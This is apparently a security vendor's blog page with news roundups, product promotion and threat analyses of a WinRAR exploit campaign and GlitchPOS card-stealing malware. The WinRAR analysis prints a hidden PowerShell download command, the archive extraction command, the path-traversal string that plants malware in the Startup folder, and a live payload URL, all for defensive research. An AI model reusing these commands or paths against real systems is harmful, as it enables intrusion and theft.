Cyber Security News & Trends – 03-29-19

/0 Comments/in /by

This week, SonicWall releases the 2019 Cyber Threat Report and hosts a live Twitter Chat!

SonicWall Spotlight

Annual SonicWall Cyber Threat Report Details Rise in Worldwide, Targeted Attacks – SonicWall Press Release

  • SonicWall releases the highly anticipated 2019 SonicWall Cyber Threat Report, delivering an in-depth look at threat intelligence obtained from more than 1 million sensors around the world.

The SonicWall Cyber Threat Report Infographic – SonicWall website

  • If you want to know the highlights of the 2019 Cyber Threat Report then look no further than our handy Infographic which breaks down the major findings.

#SonicWallChat – Twitter Chat

  • To celebrate the release of the 2019 Cyber Threat Report we hosted our first live Twitter Chat! SonicWall Threat Researchers took over our Twitter handle and fielded questions about the Threat Report from our Twitter followers.

Perpetual ‘Meltdown’: Security in the Post-Spectre Era – Data Breach Today

  • The growing frequency and complexity of side-channel attacks, including Meltdown, Spectre and most recently Spoiler, is proving a growing threat to security. SonicWall CEO addresses this specific challenge in a video interview with Data Breach Today at the recent RSA Conference in San Francisco.

SonicWall Report Paints Sobering Picture of Cyberthreat Trends – Silicon Angle

  • Silicon Angle review the 2019 SonicWall Cyber Threat Report, stating that the results “don’t make happy reading for security personnel.”

SonicWall 2019 Cyber Threat Report Says Canadian Malware up More Than 100 per Cent – Channel Buzz (Canada)

Cyber Security News

Virus Attacks Spain’s Defense Intranet, Foreign State Suspected: Paper – Reuters

  • An undetected virus infecting the Spanish Defence Ministry’s intranet may have been active for months. Sources suspect a foreign state is behind the cyberattack.

Toyota Announces Second Security Breach in the Last Five Weeks – ZDNet

  • Toyota announced that it has been hit by a data breach for the second time in five weeks with servers storing information on up to 3.1 million customers affected. Experts suggested that APT32 hackers might have targeted Toyota’s Australia branch as a way to get into Toyota’s more secure central network in Japan.

Ransomware Behind Norsk Hydro Attack Takes on Wiper-Like Capabilities  – Threat Post

  • LockerGoga is the ransomware that has cost Norsk Hydro millions but researchers are still unsure who has created it and, since many of those infected cannot even view the ransom note, what their intent is.

Digital Footprint, Age, Position Determining Factors in Email Attacks – SC Magazine

  • A recent study found that it is possible to determine whether a person may be targeted by a fraudulent email by checking factors such as if they were caught in previous data breach, or even their age – older people who have been online longer than younger people are more likely to have been affected by a previous cyber incident.

 

In Case You Missed It

Advanced Security Training: New SonicWall Network Security Professional (SNSP) Course & Certification

/0 Comments/in /by

Building on the success of the recently released SonicWall Network Security Administrator (SNSA) course and certification, SonicWall is proud to announce the release of the SonicWall Network Security Professional (SNSP) course.

Designed for today’s IT professionals who need to go beyond basic administration skills, the SNSP program provides network and security engineers with the in-depth technical knowledge required to maximize the capabilities of SonicWall’s next-generation firewall appliances in complex environments.

What is SNSP and how is it improved?

The SNSP cybersecurity training program includes 16 learning modules taught during two days of instructor-led classroom training, including advanced routing, interface settings, advanced high availability and implementing best practices. It features:

  • 60 percent hands-on labs
  • 40 percent training lectures
  • Based on the recently released SonicOS 6.5.2 firmware

The SNSP will replace the existing Network Security Advanced Administrator (NSAA) course, which will be retired on June 30, 2019. After this date, no additional NSAA courses will be offered. However, the associated Certified SonicWall Security Professional (CSSP) certification will remain valid for two years after completion.

Delivery of the SNSP program will align with other SonicWall certification courses and will be incorporated into our existing Authorized Training Partner (ATP) strategy. This will ensure consistency in the delivery of training, regardless of where it is received, or which ATP provides it.

For more information on the SNSP course, or to find scheduled classes, go to the SonicWall Training and Certification page.

WordPress Vulnerability Roundup – Q1 2019

/in /by

WordPress is a free open-source content management system. It powers about 30% of all websites on the internet and 33% of the Top 10 Million Sites globally. There are over 50,000 WordPress plugins available to add-in features and extend the functionality of WordPress websites. Since WordPress is the most popular CMS, it becomes the common target for hackers to cause more damage than any other platform.

Since the beginning of the year 2019, three zero-day vulnerabilities have been discovered on WordPress plugins Total donations, Easy WP SMTP and Social Warfare. These were actively being exploited in the wild and hackers continue to compromise WordPress websites that are still unpatched.

The SonicWall Capture Labs Threat Research Team has analyzed and addressed WordPress Vulnerabilities for Q1 2019. 

The three  vulnerabilities that WordPress suffers are from the WordPress Core, plugins, and themes.

Fig: Q1 2019 WordPress vulnerability distribution by components

Cross-site scripting (XSS) is at the top of the list. WordPress plugins are prone to Cross-site scripting as they fail to properly sanitize user-supplied input.

Fig: Q1 2019 WordPress vulnerability distribution by types

Nearly 40 WordPress vulnerabilities disclosed just in the month of March. Most of the bugs were in the plugins that extend the WordPress webpage’s functionality.

Fig: Q1 2019 WordPress vulnerability 

The top vulnerable plugins include the popular ones, WooCommerce with 4+ million active installations. Followed by WP Google Maps with 400,000+ active installations. 

Fig: Q1 2019 Top Vulnerable WordPress plugins

1. How To Fix WordPress Zero Day Plugin Vulnerability?
 Immediately check to see if there is a patch available. If no patch available, consider disabling and deleting the plugin that contains the Zero Day vulnerability.
2. How to secure WordPress websites?
WordPress has detailed the following security best practices   
3. What to do when my WordPress website is hacked?

SonicWall Capture Labs Threat Research team provides protection with the following signatures:

IPS: 14105 WordPress plugin Easy SMTP vulnerability
IPS: 14106 WordPress plugin Social Warfare XSS Vulnerability
IPS: 14005 WordPress Total Donations Plugin Authentication Bypass 1
IPS: 14006 WordPress Total Donations Plugin Authentication Bypass 2
WAF: 1704 WordPress Social Warfare Cross-Site Scripting Vulnerability
WAF: 1703 Easy WP SMTP Unauthenticated Arbitrary wp_options Import
WAF: 1691 WordPress Total Donations Plugin Authentication Bypass

2019 SonicWall Cyber Threat Report: Unmasking Threats That Target Enterprises, Governments & SMBs

/0 Comments/in /by

The launch of the annual SonicWall Cyber Threat Report always reminds us why we’re in this business.

Our engineers and threat researchers dedicate months to the project in order to shed light on how people, businesses and organizations online are affected by cybercrime.

What they found is telling. Across the board, cyberattacks are up. Criminals aren’t relenting. Hackers and nefarious groups are pushing attacks to greater levels of volume and sophistication. And the 2019 SonicWall Cyber Threat Report outlines how they’re doing it and at what scale.

To understand the fast-changing cyber arms race, download the complimentary 2019 SonicWall Cyber Threat Report. The unification, analysis and visualization of cyber threats will empower you and your organization to fight back with more authority, determination and veracity than ever before. So, let’s take a look at what’s included.

Malware Volume Still Climbing

In 2016, the industry witnessed a decline in malware volume. Since then, malware attacks have increased 33.4 percent. Globally, SonicWall recorded 10.52 billion malware attacks in 2018 — the most ever logged by the company.

UK, India Harden Against Ransomware

SonicWall Capture Lab threat researchers found that ransomware was up in just about every geographic region but two: the U.K. and India. The report outlines where ransomware volume shifted, and which regions were impacted most by the change.

Dangerous Memory Threats, Side-Channel Attacks Identified Early

The report explores how SonicWall Real-Time Deep Memory InspectionTM (RTDMI) mitigates dangerous side-channel attacks utilizing patent-pending technology. Side-channels are the fundamental vehicle used to exploit and exfiltrate data from processor vulnerabilities, such as Foreshadow, PortSmash, Meltdown, Spectre and Spoiler.

Malicious PDFs & Office Files Beating Legacy Security Controls

Cybercriminals are weaponizing PDFs and Office documents to help malware circumvent traditional firewalls and even some modern day network defenses. SonicWall reports how this change is affecting traditional malware delivery.

Attacks Against Non-Standard Ports

Ports 80 and 443 are standard ports for web traffic, so they are where many firewalls focus their protection. In response, cybercriminals are targeting a range of non-standard ports to ensure their payloads can be deployed undetected in a target environment. The problem? Organizations aren’t safeguarding this vector, leaving attacks unchecked.

IoT Attacks Escalating

There’s a deluge of Internet of Things (IOT) devices rushed to market without proper security controls. In fact, SonicWall found a 217.5 percent year-over-year increase in the number of IoT attacks.

Encrypted Attacks Growing Steady

The growth in encrypted traffic is coinciding with more attacks being cloaked by TLS/SSL encryption. More than 2.8 million attacks were encrypted in 2018, a 27 percent increase over 2017.

The Rise & Fall of Cryptojacking

In 2018, cryptojacking diminished nearly as fast is it appeared. SonicWall recorded tens of millions of cryptojacking attacks globally between April and December. The volume peaked in September, but has been on a steady decline since. Was cryptojacking a fad or is more on the way?

Global Phishing Volume Down, Attacks More Targeted

As businesses get better at blocking email attacks and ensuring employees can spot and delete suspicious emails, attackers are shifting tactics. They’re reducing overall attack volume and launching more targeted phishing campaigns. In 2018, SonicWall recorded 26 million phishing attacks worldwide, a 4.1 percent drop from 2017.

WinRAR Vulnerability actively being exploited in the wild

/in /by

WinRAR is the world’s most popular compression tool with over 500 million users worldwide. Last month, a critical WinRAR vulnerability, that existed for 19 years, was disclosed. This vulnerability is easy to exploit and all users that have unpatched versions of WinRAR are at risk. In the last one month, VirusTotal has collected over 200 unique WinRAR exploits.

There have been two major exploits of this vulnerability, one targeting Ukraine with an Ukrainian law related PDF document and another targeting users in the Middle East. Last week, SonicWall Capture Labs Threat Research team has observed another campaign targeting users in Chile. WinRAR vulnerability is the most sought after exploit used by both cyber criminals and nation state actors.

Infection Cycle:

In this campaign, malicious batch script is sent through phishing documents. Upon execution, the batch script drops the WinRAR exploit that has a malware program . The batch script then calls WinRAR.exe to extract the crafted archive file. Upon extraction, a malware program gets planted under “Start Menu”. Malware program runs automatically after every system reboot, installs backdoors, steals user information and connects with the Command and Control (C&C) server.

The batch script gets delivered as __Denuncia_Activa_CL.PDF.bat, named to look like an active complaint report targeting Chile law office.  The batch script is encoded in Little-endian UTF-16 format, an ASCII output is shown below.


Fig: __Denuncia_Activa_CL.PDF.bat

 Currently this script is not detected by any of the engines in the VirusTotal.

 Fig: VirusTotal detection score for the batch script

Upon execution, the malicious batch script performs the following actions

  • Drops payload

It runs PowerShell command to drop the exploit denuncias.rar file.

PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%'

  • Extracts archive

It later calls the vulnerable WinRAR.exe in the user machine to extract the malicious archive file. 
%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%

  • Exploits vulnerable host

It exploits the remote code execution vulnerability in the WinRAR by just extracting the crafted WinRAR archive.

CVE-2018-20250:  This vulnerability is due to improper handling of the relative path of a file in an ACE archive, which leads to directory traversal. WinRAR makes use of a third party library, unacev2.dll, for unpacking ACE archive files. In this function, it goes through several steps to check if the file name is a normal relative path. If filename is an absolute path that contains the drive letter, or points to a share folder, it will remove the drive letter or shared folder path, but keep the rest of the directory structure. However, this check can be bypassed with a specific directory sequence at the beginning of the path. 

The WinRAR archive pretends to have just two plain text documents.


Fig: WinRAR exploit archive file denuncias.rar

A malware program named “Integrity.exe” is hidden under “C:” drive with the file path specified as “C:\C:C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”.


Fig:  Malware program Integrity.exe with the crafted file path

Checkpoint has detailed the following vector where the following file path gets translated during file path integrity check.

C:\C:C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

It removes “C:\C:” leaving the file path as given below

C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

Here “C:” is translated to the “current directory” of the running process. The “current directory” of WinRAR will be the path to the folder that the archive resides in. since the archive is dropped into the user’s Downloads folder, the “current directory” of WinRAR will become
C:\Users\Username\Downloads

Hence the path “C:../” traverses from the Downloads folder to the User folder and later concatenates the relative path to the startup directory with AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Thus by extracting the malicious archive on vulnerable hosts, the script plants the malware program “integrity.exe” on the startup directory as shown below


Fig: Integrity.exe planted in startup directory

  • Pings for delay simulation

It pings the localhost to delay the execution for few seconds.

ping 127.0.0.1 -n 1 > nul

  • Shuts down

Finally the script shuts down the machine, forcing the user to boot up the machine, to kick start the malicious program under the Start Menu. While a normal reboot by the user would also have the same effect,  for some reason this campaign doesn’t want to wait until the user initiates the reboot. 

Upon reboot, the malicious program “Integrity.exe” gets into action and connect with the Command and Control (C&C) server.


Fig: Exploit campaign targeting Chile users

Hashes
Batch script:
9008b75ac8bbaacbda0dc47bb7d631f1c791cb346cc6f6a911e7993da0834c09
First seen: 2019-03-22 00:39:43

RAR archive :
b5a84e8079dc8558d3960d711d8591500b69cf79e750ecaf88919e398c59383f
First seen: 2019-03-21 20:30:32

Malware Payload:
421448d92a6d871b218673025d4e4e121e263262f0cb5cd51e30853e2f8f04d7
First seen: 2019-03-22 03:57:40

Payload Url:
https://www.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar

Trend Chart:

 

Fix
Upgrade to the latest WinRAR version to resolve the issue
WinRAR prior to 5.70 beta 1 are affected by this vulnerability

SonicWall Capture Advanced Threat Protection (ATP) provides protection against this with its multi-engine approach.

SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

SPY5408 Malformed-File ace.TL.1
IPS: 14052 File-Format ace
IPS: 14056 Archive Ace 2 (HTTP Download)

 

 

GlitchPOS, the new point-of-sale malware actively spreading in the wild.

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant POS family named GlitchPOS Detected as GAV: GlitchPOS.A actively spreading in the wild.

GlitchPOS is a fake cat game which is embedded in the malware and not displayed at the time of execution. GlitchPOS typically has the capability such as scraping memory to retrieve Credit Card Data during its scan.

Contents of GlitchPOS Malware

 

Infection Cycle:

The Malware adds the following files to the system:

  • %Userprofile%Application Data\SearchIndexer.exe [Detected as GAV: GlitchPOS.A (Trojan)]]
  • %Userprofile%Local Settings\Temp\x.vbs

The Malware adds the following file to the startup folder to ensure persistence upon reboot:

  • %Userprofile%Start Menu\Programs\Startup\SearchIndexer.lnk

Once the computer is compromised, the malware creates a new process to maintain persistence and then launches a component to monitor for sensitive payment card data.

GlitchPOS retrieves a list of running processes; the malware is responsible for scraping the memory of current processes on the infected machine for credit card information periodically.

GlitchPOS has an exclusion list that functions to ignore certain system processes; it gathers track data by scanning the memory of all running processes except for the following List:

Once it locates payment card data, GlitchPOS makes one HTTP request to determine the infected system’s external IP address.  GlitchPOS generates a random identifier for the target machine and sends to the C&C server.

GlitchPOS uses a basic encryption and Hex encoding method to obfuscate various strings such as the shellcode, filenames, and process names to evade detection.

Once the public IP is acquired, GlitchPOS tries to verify Credit Cards numbers and then sends track 1 and track 2 credit card data in encrypted format.

GlitchPOS tries to Enumerate Credit Card data from POS Software using the Luhn algorithm and then encrypts and sent to one of the given C&C Servers.

Here is an example of Track data:

Command and Control (C&C) Traffic

GlitchPOS performs C&C communication over port 80. Requests are made on a regular basis to statically defined domains such as:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: GlitchPOS.A (Trojan)

 

 

Cyber Security News & Trends – 03-22-19

/0 Comments/in /by

This week, SonicWall’s Cyber Threat Report is just around the corner, Facebook stored passwords in a searchable format and a hacker sets off tornado sirens in Texas.

SonicWall Spotlight

Unmasking the Threats: A Preview of the 2019 SonicWall Cyber Threat Report – SonicWall Blog

  • SonicWall’s Terri O’Leary previews the 2019 SonicWall Cyber Threat Report, scheduled for release on March 26, including information about our upcoming Twitter chat.

Cyber Security News

Facebook Stored Millions of User Passwords in Plain, Readable Text – NPR

  • Facebook stored hundreds of millions of user passwords in unencrypted and internally searchable plain text for years. The company says there are no signs of misuse of this data, and that the password logging was inadvertent.

How Hackers Pulled Off a $20 Million Mexican Bank Heist – Wired

  • Flawed, unprotected and insecure network architecture allowed hackers to exploit the Mexican bank infrastructure and pull off a $20 million bank heist. This involved coordinating long distance communication, recruitment and training for hundreds of people but Wired reports that this was feasible because many would have been willing to work for less than $260 each.

Hacked Tornado Sirens Taken Offline in Two Texas Cities Ahead of Major Storm – ZDNet

  • A hacker set off over 30 tornado emergency sirens in the middle of the night in two North Texas cities. “It has become evident that a person or persons with hostile intent deliberately targeted our combined outdoor warning siren network,” Lancaster officials said in a statement.

Nielsen Warns US ‘Not Prepared’ for Foreign Cyberattacks – The Hill

  • S. Homeland Security Secretary Kirstjen Nielsen says that the U.S. “is not prepared” to handle hackers backed by other countries, warning that an attack by a nation state against the internet connected device of an “average private citizen” is not a fair fight.

New Europol Protocol Addresses Cross-Border Cyberattacks – Dark Reading

  • The Council of the European Union has adopted a new EU Law Enforcement Emergency Response Protocol intended to prepare for, and protect from, large-scale, cross-border cyberattacks. It also aims to help law enforcement immediately respond to any cyberattacks that do happen.

Aluminum Maker Hydro Battles to Contain Ransomware Attack – Reuters

  • One of the largest aluminum producers had to shut down several of its plants to contain a ransomware attack after they were infected by a malware known as LockerGoga. The company say its intention is to restore encrypted files rather than pay the ransom.

DDoS Attack Size Drops 85% in Q4 2018 – Dark Reading

  • The average denial-of-service (DDoS) attack size shrunk 85% in the fourth quarter of 2018 following an FBI takedown of DDoS-for-hire websites in December 2018. Researchers believe that this decline is likely only to be temporary because the downed websites served as payment gateways rather than as the technology used to launch the attacks.

MyPillow and Amerisleep Wake up to Magecart Card Theft Nightmare – ZDNet

  • Hundreds of Magecart incidents are thought to occur daily but two U.S. mattress and bedding merchants are thought to have not acknowledged major attacks on their websites going as far back as 2017; attacks that may still be ongoing.

In Case You Missed It

Unmasking the Threats: A Preview of the 2019 SonicWall Cyber Threat Report

/0 Comments/in /by

Each year, the SonicWall Capture Labs threat research team gathers and analyzes threat data captured by the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world. The end result is one of the cybersecurity industry’s most anticipated and comprehensive reports on the current threat landscape: the annual SonicWall Cyber Threat Report.

The 2019 SonicWall Cyber Threat Report is scheduled for release on March 26. As always, the threat intelligence contained within the full report will prove vital to enterprise and government IT security teams globally.

The report will also help SMBs navigate the complex cyber threat landscape. The 2018 State of Cybersecurity in Small and Medium Size Businesses study revealed that 47 percent of respondents admitted to having no understanding of how to defend their companies against cyberattacks.

At SonicWall, we are committed to helping SMBs arm themselves with the knowledge and solutions necessary to navigate the current threat landscape and protect what is important to them. SonicWall President and CEO Bill Conner considers the annual Cyber Threat Report to be a vital component in SonicWall’s mission “to ensure organizations and businesses are better informed to safeguard their networks and data.”

“Investing in cyber threat research and publishing our findings,” explains Bill, “helps foster collaboration between the private sector, security industry and trusted third parties to bolster a strong, united front against cyberattacks.”

What to Expect

To give you an idea of what you can expect from this year’s full report, we’ve pulled some highlights and high-level perspectives on the threat intelligence from SonicWall Capture Labs threat researchers.

Individual Countries are Driving Change
After SonicWall Capture Lab threat researchers finished analyzing full-year 2018 threat data, a number of shocking revelations were made. In a number of threat areas, individual countries are bucking the global trends and managing to achieve significant volume reductions in major attack areas like ransomware.

Attacks Against Non-Standard Ports
Ports 80 and 443 are standard ports for web traffic, so they are where most firewalls focus their protection. In response, cybercriminals are targeting a range of non-standard ports to ensure their payloads can be deployed undetected in a target environment. The problem? Organizations aren’t safeguarding this vector, leaving attacks unchecked.

Processor Vulnerabilities Growing

New side-channel threats, such as Spectre, Meltdown, Foreshadow, Spoiler and PortSmash, are moving the cyber war to an entirely new theater — one that is extremely difficult to monitor, defend or patch.

Want the report first?

To promote global awareness and facilitate important dialogues, SonicWall remains steadfast in its commitment to research, analyze and share threat intelligence via the 2019 SonicWall Cyber Threat Report. Sign up now and be first to #KnowTheThreats.

GET IT FIRST

Ask an Insider: Join our Twitter Chat

Ready to learn more about the data behind the 2019 SonicWall Cyber Threat Report? Or do you want to ask a SonicWall researcher about some of the report conclusions and predictions? Join us and our guest researchers from SonicWall Capture Labs in an upcoming SonicWall Twitter Chat. Here’s a preview of the questions we’ll be asking you and our researchers:

  • In your opinion, what was the worst data breach of 2018?
  • What are your biggest concerns about side-channel attacks?
  • Why have PDFs and Office files become such a popular attack vector?
  • What is a new attack variant and how can there have so many in 2018?
  • What types of IOT devices are most often compromised?
  • What are the business impacts of cryptojacking attacks?
  • What’s the worst cybersecurity advice you’ve ever been given?
  • What are your 2019 predictions?

To join our chat, and ask our researchers anything, follow @SonicWall and the hashtag #SonicWallChat on Twitter starting at 11 a.m. CDT on March 28.

Sign up now to receive the full 2019 SonicWall Cyber Threat Report, which will feature detailed threat findings, best practices, predictions and more, to help you stay a step ahead in the global cyber arms race.

Cyber Security News & Trends – 03-15-19

/0 Comments/in /by

This week, vote for SonicWall in 2019 CRN Channel Madness, Facebook suffers an outage worldwide, and one U.S. County pays a $400,000 ransom.

SonicWall Spotlight

SonicWall’s HoJin Kim has been nominated in the 2019 CRN Channel Madness Tournament.

  • CRN’s fifth annual Channel Madness Tournament of Chiefs pits some of the channel’s best-known executives against in each other. Vote for HoJin Kim now!

SonicWall Launches Security Solutions for Wireless Networks, Cloud Apps and Endpoints – CRN (India)

  • SonicWall’s Debasish Mukherjee is quoted talking about the release of new SonicWall products and the expansion possibilities for SonicWall in the Indian market.

SonicWall Now a California Multiple Award Schedule (CMAS) Vendor – SonicWall Blog

  • Being a CMAS vendor allows SonicWall to support K-12 education through the E-rate program, a Federal funding program that allows technology products and services to be purchased by school districts and libraries.

Cyber Security News

Hackers Use Slack to Hide Malware Communications – CSO Online

  • Cyberattackers have been using a previously undocumented backdoor program to launch an attack on users of Slack. A fully patched computer will prevent the attack but in cases where the exploit runs successfully it triggers a damaging multi-stage infection.

Web Inventor Tim Berners-Lee Calls for ‘Fight’ Against Hacking and Abuse on its 30th Birthday – CNN

  • On the 30th anniversary of its launch, the inventor of the world wide web called out three major “sources of dysfunction” affecting it; deliberate malicious intent, system design and the unintended negative consequences of benevolent design.

Facebook’s Daylong Malfunction Is a Reminder of the Internet’s Fragility – New York Times

  • A technical error by Facebook led to a worldwide outage that affected Facebook, WhatsApp and Instagram. The New York Times looks at how the more tightly woven a computer network becomes, the more likely it is that a small problem can grow into a large one.

Applicant Data Hacked and Ransomed at Three U.S. Colleges – Fortune

  • Three U.S. colleges recently suffered successful ransomware attacks. The hackers were able to fool college staff members into handing over passwords and then took control of databases that housed student applicant information.

Hackers Cop a FILA Thousands of UK Card Deets After Slinking Onto Clothing Brand’s Servers – The Register (UK)

  • Sportswear brand FILA are the latest company to suffer from a damaging malware infection with an attack similar to Magecart infecting card payments on their website.

US Senators Want to Know How Many Times They’ve Been Hacked – ZDNet

  • Two US senators have requested the US Senate Sergeant at Arms to provide each senator with both annual statistics about cyberattacks and a commitment to disclosing breaches within five days of discovery.

Georgia County Pays a Whopping $400,000 to Get Rid of a Ransomware Infection – ZDNet

  • Officials in Jackson County, Georgia, negotiated with cybercriminals to pay a $400,000 ransom after being successfully infected with ransomware.

In Case You Missed It

Wireless Security, Wi-Fi Management Hot Topics at RSA Conference 2019

/0 Comments/in , /by

Like the many years before it, RSA Conference 2019 in San Francisco was full of buzz, energy, product “noise” and, this year, lots of heavy rain. And, of course, I forgot to bring my umbrella.

Rain or shine, RSA draws over 50,000 attendees each year. The event provides a chance to get to know the hot products shaping the security industry, hear from industry experts and connect with peers.

Although many fantastic cybersecurity products were on display on the expo floor, there were a few that completely stood out — and the end-to-end SonicWall wireless solution was among them.

Wireless security, planning and management from a single solution

The SonicWall wireless solution is comprised of SonicWave access points, WiFi Cloud Manager, WiFi Planner and the SonicWiFi mobile app. In fact, Biztech named the SonicWave wireless access points among the new and useful technology seen at the show. (Go to the 3:30 mark in the video below.)

SonicWave access points (AP) combine high-performance IEEE 802.11ac Wave 2 wireless technology with flexible deployment options. The APs can be managed via the cloud using SonicWall WiFi Cloud Manager or through SonicWall’s industry-leading next-generation firewalls. The result is a solution that could be untethered from the firewall to provide you a superior WiFi user experience that’s as secure as any wired connection.

SonicWave access points take advantage of the Wave 2 standard with MU-MIMO support, which enables simultaneous transmission to numerous Wave 2-enabled wireless clients, providing an enhanced user experience. You can also easily extend your Wi-Fi networks and effortlessly set it up with mesh technology.

Wireless security — even without a firewall

SonicWall integrates advanced security right on the access points. The cloud-based, multi-engine Capture Advanced Threat Protection (ATP) sandbox and Content Filtering Service (CFS) can be enabled on the access points to provide advanced threat detection and protection.

SonicWave access points provide you comprehensive wireless security with features including a dedicated third radio for security scanning, wireless intrusion detection and prevention, wireless firewalling, secure Layer 3 wireless roaming and more.

Easy Wi-Fi planning, management from the cloud

If you aren’t an RF expert, getting the right AP placement for optimal coverage or density is somewhat impossible. Prior to AP deployment, designing and planning Wi-Fi networks with a site survey tool is essential.

This is where SonicWall WiFi Planner comes to your rescue. It is a predictive, cloud-based site-survey tool to ensure you have the best RF plan.

Once you have a plan, next you need to onboard the devices. The SonicWall SonicWiFi mobile app, available on iOS and Android, helps you monitor networks, easily onboard wireless access points and set up wireless mesh networks.

After onboarding you need to manage maybe dozens or even thousands of SonicWave access points. Named one of the 16 hottest network and endpoint security products at RSA by CRN, SonicWall WiFi Cloud Manager streamlines the process. It is available via the cloud-based Capture Security Center and delivers single-pane-of-glass visibility to reduce costs and simplify Wi-Fi management.

Wave 2 wireless access points are reliable, easy to manage

SonicWave access points are ideal for most deployments as they provide reliable user experience with flexible management. SonicWave 200 series access points are best suited for medium-to-low density requirements.

For example, the SonicWave 231c can be used indoors in retail stores or classrooms and can be installed on ceilings. While the SonicWave 224w can be used in indoor locations like hotel and hospital rooms.

On the other hand, the SonicWave 231o outdoor access points are IP67-rated to withstand tough outdoor conditions and fit perfectly in outdoor spaces like parks, playgrounds and parking lots. For higher density requirements, SonicWave 400 series access points is ideal.